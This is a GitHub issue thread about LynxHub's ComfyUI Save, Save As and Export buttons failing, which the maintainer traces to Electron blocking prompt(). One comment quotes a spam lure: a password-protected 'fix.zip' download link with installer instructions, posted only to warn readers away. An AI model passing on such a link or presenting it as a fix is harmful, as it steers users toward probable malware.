### ISSUE TITLE
Workflow saving not working (Save As / Save / Export)

### ISSUE THREAD

**Issue by MoreColors123** [KindaBrazy/LynxHub#7]
Great Tool! Its a real nice UI/UX. Brace yourself for incoming bugreports :>

**Describe the bug**
When I press "Save As" (or Save or Export) in the new ComfyUI Top-Toolbar, NOTHING happens. 

**Expected behavior**
A Window popping up to ask me where I want to save the workflow.

**Screenshots**
![grafik](https://github.com/user-attachments/assets/9683852b-817f-45d3-923d-197e5531fcbd)

**Please complete the following information:**
- OS: Windows 10
- LynxHub Version 1.0.0

**Comment by MoreColors123** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

F*ing spammers, don't click this!

**Comment by KindaBrazy** [comment]
Those buttons use `prompt()` to interact, and I've just started working on fixing that.
Thank you for reporting it!

**Comment by KindaBrazy** [comment]
It seems like Electron is preventing prompt from working due to thread blocking. [Issue link](https://github.com/electron/electron/issues/472). I'm working on finding an alternative solution or possibly overriding the default prompt if possible.
